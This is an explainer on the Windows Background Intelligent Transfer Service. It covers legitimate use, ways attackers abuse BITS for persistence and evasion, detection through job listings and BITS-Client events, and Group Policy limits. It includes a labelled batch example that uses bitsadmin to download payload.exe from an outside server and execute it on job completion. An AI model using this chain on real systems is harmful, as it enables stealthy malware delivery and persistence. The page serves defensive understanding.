
BITS (Background Intelligent Transfer Service)

Introduction

The Background Intelligent Transfer Service, or BITS, is an incredibly useful tool for programmers and system administrators. It downloads files from and uploads files to HTTP web servers and SMB file shares, and it weighs the cost of the transfer and current network usage so that your foreground work doesn't have to wait. BITS is also great at handling network interruptions: it pauses and automatically resumes transfers, even after a reboot. It comes with PowerShell cmdlets for creating and managing transfers, as well as the BitsAdmin command-line utility.

Use BITS for applications that need to:

  • Download from or upload files to an HTTP or REST web server or SMB file server.
  • Automatically resume file transfers after network disconnects and computer restarts.
  • Preserve the responsiveness of other network applications.
  • Be mindful of the network cost of the transfer.


Example applications:

  • Windows Update: The BITS service is used to download and install Windows updates.
  • Microsoft Office: Microsoft Office applications, such as Word and Excel, use BITS to download and install updates and features.
  • Adobe Creative Cloud: Adobe Creative Cloud applications use BITS to download and install updates and new features.
  • Microsoft Store: The Microsoft Store uses BITS to download and install apps and updates.
  • Windows Defender: Windows Defender uses BITS to download and install updates and signature files.


Example Code:

```powershell
Import-Module BitsTransfer
mkdir -Force c:\temp\BITSFILES
Start-BitsTransfer -Source https://aka.ms/WinServ16/StndPDF -Destination c:\temp\BITSFILES\WindowsServer2016.pdf
```

Why is the BITS Service a potential security risk?

  • Potential exploitation: The BITS service can be used by malware to download and install malicious software without user interaction, with job metadata controlling retry attempts and post-completion commands.
  • Defense Evasion: Attackers can programmatically create BITS jobs to download malicious files or execute commands upon completion. A newly created job stays suspended until it is configured and resumed, and it transfers files without the user being aware.
  • Elevation: Creating BITS jobs does not require elevated privileges, so an attacker can create jobs that execute malicious code without administrative rights.
  • Persistence before Windows 10: If a BITS job doesn't complete, it is reactivated when the user logs in, so a malicious payload can be executed repeatedly, giving a sustained foothold.
  • Persistence after Windows 10: If the remote server is configured not to respond, Windows keeps retrying the job until the attacker decides to make the server respond and deliver a payload.
  • Firewall Evasion: The BITS service is generally allowed through by most host-based firewalls.

DANGER

Deprecation of bitsadmin
The bitsadmin tool was deprecated in Windows 7 and Windows Server 2008 R2 and is superseded by the PowerShell BITS cmdlets.
Even so, bitsadmin.exe is still shipped in the Windows\System32\ folder.

Attack Mechanism

Attackers configure BITS jobs via the COM interface, PowerShell or the Bitsadmin tool. Jobs can download malicious files and execute commands after the transfer. Jobs remain active until explicitly completed, facilitating persistence. One notable technique is event-driven execution, where attackers can control payload delivery by manipulating server responses. The BITS service also has upload functionality that can be abused for exfiltration.


Example Code for malicious use of bitsadmin.exe:

```batch
REM This command creates a new BITS job (it starts in the Suspended state)
bitsadmin /create myattackjob

REM This command adds a file to the BITS job. It specifies that the file 'payload.exe' should be downloaded from 'http://myserver/payload.exe' and saved to the '%TEMP%' directory on the local machine as 'payload.exe'.
bitsadmin /addfile myattackjob "http://myserver/payload.exe" "%TEMP%\payload.exe"

REM This command sets the notification flags for the BITS job. Flag 1 means "notify when all files in the job have been transferred".
bitsadmin /setnotifyflags myattackjob 1

REM This command sets the notification command line for the BITS job. When the job is complete, it executes 'cmd.exe', which marks the job complete and then starts the downloaded 'payload.exe'.
bitsadmin /setnotifycmdline myattackjob "C:\windows\system32\cmd.exe" "/C bitsadmin /complete myattackjob & start %TEMP%\payload.exe"

REM This command resumes the BITS job, starting the download process.
bitsadmin /resume myattackjob
```

Detection and Monitoring

Detecting BITS abuse is difficult: completed jobs are logged in the Windows event log, but crucial information about the commands executed is often missing. Network monitoring can help identify suspicious BITS (SMB and HTTP) traffic.

Active jobs can be monitored using the bitsadmin tool (bitsadmin /list; add /allusers from an elevated prompt to see other users' jobs), PowerShell (Get-BitsTransfer, with -AllUsers) or the Windows Event Log. Events in the BITS Client log (IDs 3, 59, 60 and 4) track jobs created and completed, but do not show details of command execution (path: Event Viewer -> Applications and Services Logs -> Microsoft -> Windows -> BITS Client). Process monitoring using tools such as Sysmon can reveal BITS-related activity.
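An added defender-side example, not code from the original page, that performs the checks described above in PowerShell: it lists every user's BITS jobs, flags the traits the text associates with abuse (a command line that runs on completion, a job parked in Suspended with files queued, a job lingering for more than a week) and then pulls the BITS-Client events named above. It assumes an elevated session and that the job object exposes the NotifyCmdLine, FileList, OwnerAccount and CreationTime properties of the BitsTransfer module.

```powershell
# Added defender-side example (not code from the original page).
# Assumes an elevated session; property names on the job object
# (NotifyCmdLine, FileList, OwnerAccount, CreationTime) are assumed
# from the BitsTransfer module.
Import-Module BitsTransfer

# 1. Live jobs for all users. Flag the traits the text describes: a command
#    line that runs on completion, a job parked in Suspended with files queued,
#    or a job that has been lingering for more than a week.
Get-BitsTransfer -AllUsers -ErrorAction SilentlyContinue | ForEach-Object {
    $job   = $_
    $flags = @()
    if ($job.NotifyCmdLine) { $flags += 'NotifyCmdLine set' }
    if ($job.JobState -eq 'Suspended' -and $job.FileList.Count -gt 0) {
        $flags += 'suspended with files queued'
    }
    if ($job.CreationTime -lt (Get-Date).AddDays(-7)) { $flags += 'older than 7 days' }

    [pscustomobject]@{
        Owner     = $job.OwnerAccount
        Name      = $job.DisplayName
        State     = $job.JobState
        Created   = $job.CreationTime
        Sources   = ($job.FileList | ForEach-Object { $_.RemoteName }) -join ', '
        NotifyCmd = ($job.NotifyCmdLine -join ' ')
        Flags     = ($flags -join '; ')
    }
} | Where-Object { $_.Flags } | Format-Table -AutoSize -Wrap

# 2. Event history from the BITS-Client operational log (the log the text points
#    to). ID 3 = job created, 4 = job completed, 59 = transfer of a URL started,
#    60 = transfer of a URL stopped (carries the HTTP status code).
$filter = @{
    LogName   = 'Microsoft-Windows-Bits-Client/Operational'
    Id        = 3, 4, 59, 60
    StartTime = (Get-Date).AddDays(-1)
}
Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue |
    Select-Object TimeCreated, Id,
        @{ n = 'Message'; e = { ($_.Message -replace '\s+', ' ').Trim() } } |
    Format-Table -AutoSize -Wrap
```

The job listing only shows entries that raised at least one flag; pair the ID 59/60 events with the URL they name to reconstruct what a job actually fetched, since ID 4 alone does not tell you.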

Defense Strategies

Disabling the BITS service is not recommended, as it may interfere with system and software updates. It would be possible to block BITS traffic at the network perimeter and deliver updates from an internal server instead. This is difficult in practice, however, because the BITS service operates over HTTP and HTTPS, and blocking these would hinder web browsing. In addition, inspecting the HTTPS traffic would require TLS interception (break-and-inspect).

A simpler way to mitigate some of the risk is through Group Policy.

  • JobInactivityTimeout: Limits how long a job can remain inactive before it is terminated. (Default: 90 days)
    • Reducing this limits how long a BITS job can be used for persistence.
  • MaxJobsPerUser: Limits the number of BITS jobs a user can create. (Default: 60 jobs per user)
    • Reducing this to zero prevents standard users from creating BITS jobs at all, restricting the functionality to administrative and service accounts, which greatly reduces risk without compromising most update functionality.

WARNING

This can still interfere with updates that your users install on their own, without any elevation.
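An added example, not from the original page, that audits the two policy values discussed above and optionally applies the tighter settings. It assumes the policy is stored where the BITS Group Policy settings are written, HKLM\SOFTWARE\Policies\Microsoft\Windows\BITS, with value names matching the setting names above (treat the path as an assumption if your environment differs), and that the session is elevated when -Apply is used.

```powershell
# Added example (not code from the original page).
# Assumes the BITS policy values live under the Group Policy registry key
# below with the value names used in the text; run elevated to apply.
param([switch]$Apply, [int]$InactivityDays = 7, [int]$JobsPerUser = 0)

$PolicyKey = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\BITS'
# Built-in defaults stated in the text, used when no policy value is present.
$Defaults  = @{ JobInactivityTimeout = 90; MaxJobsPerUser = 60 }

function Get-BitsPolicy {
    foreach ($name in $Defaults.Keys) {
        $value = (Get-ItemProperty -Path $PolicyKey -Name $name -ErrorAction SilentlyContinue).$name
        [pscustomobject]@{
            Setting   = $name
            Effective = if ($null -eq $value) { $Defaults[$name] } else { $value }
            Source    = if ($null -eq $value) { 'built-in default' } else { 'policy' }
        }
    }
}

'Current BITS policy:'
Get-BitsPolicy | Format-Table -AutoSize

if ($Apply) {
    if (-not (Test-Path $PolicyKey)) { New-Item -Path $PolicyKey -Force | Out-Null }
    # Shorter inactivity window: an abandoned or deliberately stalled job is
    # purged after $InactivityDays instead of 90 days.
    Set-ItemProperty -Path $PolicyKey -Name JobInactivityTimeout -Value $InactivityDays -Type DWord
    # Zero jobs per user: standard users can no longer queue jobs; service and
    # administrative accounts keep the functionality, as the text describes.
    Set-ItemProperty -Path $PolicyKey -Name MaxJobsPerUser -Value $JobsPerUser -Type DWord
    'Applied. Run gpupdate /force (or restart the BITS service) for the change to take effect:'
    Get-BitsPolicy | Format-Table -AutoSize
}
```

Run it without -Apply first to see whether the defaults are still in force; set -JobsPerUser to a small non-zero value if the WARNING above applies to your users.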